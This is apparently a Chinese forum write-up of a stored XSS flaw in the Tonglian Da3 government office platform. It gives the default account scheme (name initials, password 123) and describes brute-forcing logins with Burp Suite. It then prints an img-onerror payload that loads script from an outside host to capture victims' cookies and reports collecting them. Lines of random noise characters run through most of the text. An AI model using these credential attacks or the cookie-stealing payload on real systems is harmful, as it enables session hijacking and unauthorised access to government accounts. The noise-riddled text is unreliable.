# g8 ?# y3 H- i9 _8 N9 {
2 ] O) D! J" ?2 `$ o3 h 同联Da3协同办公平台后台通用储存型xss漏洞
* P3 W* s' H2 o3 P! p; x, D4 e J
$ A' s7 ^! z. x2 j
6 z) V3 k" h6 ~1 q3 A. x
平台简介:
. z1 c' N8 H* N7 }' N ~9 q2 x
% e( @$ J1 \ J
( Q M6 i- Q& F
8 ]+ z; T, k- y( ~- F% _9 T9 n
) L! I( a( C/ K+ r- P, D6 K
9 X! K2 G5 ^2 A E3 A, l" n 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
7 V9 `* l9 j7 V+ R% F" H1 ?& I; I同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
# }9 v- l2 Q5 [ B9 m
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
9 Z" ?$ ~! t, \
# j( y3 s+ Q. K, Q/ K% e
* ]& q6 L1 ~& R
3 i+ |: L3 C! l! N; s
! _8 S/ V# [( x0 c3 U, [, f$ K
0 e& J' P$ \! j6 e4 s8 N 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
9 f: w7 U6 b! m4 {" q
( [, r+ C P! ^+ V* t
0 G' A2 x3 _. G) x+ g; J& L 3 O5 C: O4 q' b$ g
4 O/ }: P) i5 ~4 v& A* O5 d1 p1 W% I! Q% F0 v
% ^; a( `. t2 B, E6 A; g( s- Q0 `
http://1.1.1.1:7197/cap-aco/#(案例2-)
8 U2 J8 Z" F3 j5 A0 C; Y5 P
4 i' H8 V" J Z0 z" a7 W
5 m& Y' C( T' [% w! M/ K http://www.XXOO.com (案例1-官网网站)
6 o# n8 o& K$ `
- H S7 s( d: @- ~% l$ P8 W( F
|3 q, F* y8 n 漏洞详情:& F6 P6 |; x: A; v0 g' t2 W
+ R+ d+ R% z h4 i" j G
1 X7 M2 W3 D! t( S2 O* R" U3 _0 Z
案例一、 w5 D2 K* |) p( k5 r
" d" }. q$ O6 f$ B( X7 s
8 h* y5 X* \/ x! Z8 w
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
5 W/ G1 w2 @) Z
( G: h% O1 F; z
, a9 Q8 h0 |$ b. G$ i8 G 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:; `2 B3 X) [1 P6 x- t0 J
- k p" K# M! }/ m/ p
: `) Q6 b. ^, N. l, c+ d9 x0 }1 ]8 T
$ A- \' R u0 q: _
+ `, F# l9 E. c1 n: n
' g8 t, v7 K! I0 l3 y4 Q3 s
# r# }/ Q; U; i7 Y3 v O9 V y
# o, ]$ x: }, i7 O5 f3 _& j* f" q % r7 G( F* l7 ^! T" |
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
1 g* J/ b% o) H5 V
$ o2 w5 ?$ ]' p! t9 V , W# S9 I `% n$ } j
: r1 c- ]$ A4 p# W
4 M* E, V; F) k" {8 J9 t; e& g. C2 D
/ v' ^/ ~5 c0 i( O5 B# J
6 j% M/ {" s X0 h4 {+ i- K
6 ?: g" E; V8 T: _" ]* R# G4 } 8 l% H% t/ w8 g! @+ x/ t5 t* ?& H
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
6 e# h* K- O* E6 s- V
% b0 F. u3 N2 _- z$ P
% i- p- `0 k' k+ X
9 i4 O( n. T" W% Q
, s, ~* ]! m9 V$ q & s7 ]+ {+ ^8 \
<img src=x3 B. ^6 A0 A$ s) ~9 W
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
: F. L2 q8 K0 E6 B
# J% o1 x0 x7 T# q4 e. b
) D/ u1 x+ g- |7 R2 H2 h4 s
, Q" Z& V3 a7 B/ y
8 L0 e1 Q0 z0 F' U" w% S
6 R( t' I+ d) L/ T$ Q 然后发送,接收cookie如图:
( K/ @: v8 q# `. [
! A5 h/ U$ g% `
2 w9 s ]' B& E5 i
) w: {! }% }8 ^ z5 [
5 Q( f8 e/ M. S' m3 Z* T- Q
1 j9 o3 t7 a. z
7 K. D. J$ o: O- d
# C9 n! ?- d S/ I+ X$ }: I
; Q+ r M& }! I2 j5 \8 v ; s/ Z, z, R: T& \
0 |. t6 s' r4 J6 u5 P# _
! Y$ _% [$ s8 Y: o9 j) A/ B5 A% ?0 ^& [
2 U9 v f+ H. U6 C
6 M1 O/ S0 h2 f9 y# ?4 N+ k
( `8 R7 H, W% M
* c' F6 Y$ y; w* h' l% d P7 b
, c9 @8 [6 d& n
& u/ D) W: t3 p5 j$ [
, d. \- o+ ^ _" T y
; q, Q0 a0 P& r, Z. \
3 }9 f0 q, G! {% m
( D; `1 A: L! v. q4 \* f: m
' z( ]/ p9 f4 |; d" K
. \6 \4 x. l$ s" f
案例2、
; q, q1 H- J& G. h- {% `
5 m8 f4 v; s/ ?7 o# [, N
/ {7 M, |6 L7 J5 B' G
前面步骤都一样,下面看效果图:
5 y! u0 V) }- F P' m
% j# J9 Y2 X% I+ }6 g: p& F
: g; @& K( \1 e/ s7 }$ U
' S! @! S& K8 N! c1 u% `- H# s
0 O d" E9 x3 u8 Q3 ^: e
4 F- N& j4 H+ t" s; X+ m3 h9 ]
- d9 O% T3 s% ^, l2 H% P% l& Q7 u, g
8 ]& N( q X4 I" M0 P" H
8 v0 S! G2 O# h. v2 b
7 r- W0 L7 C+ ?" J
0 w3 W: C. a4 t a
) j1 @' Z, [0 ]8 o
, A* {: d* x4 n, x6 O* h1 ~
# Y5 s+ j T+ W$ \4 C! I1 Q
7 `6 y6 M, ^* L& i4 Y
5 `) v# w$ o4 W4 {" `. k8 s
0 ^' Q3 z O& y. B. B $ v8 C, y! r7 U2 A) n
$ H2 a% f7 z/ B$ k o- f( W
1 r, D. i9 @0 m) L8 L$ N- V
/ }8 t1 z F: K+ r. G9 U* x
, p; E: N( Q8 V" p" h# l/ q5 N
) o' `# v# n5 k. E3 s7 y
8 d, G k1 R# X. s C( F
. s2 B. W) _/ I+ ]8 T5 @9 E# d2 \
, s9 h- m- n& j3 k( O% }1 S
0 h! J6 E. n d6 ]7 X
6 j% P- H& G P$ y* @
T3 z, g O! m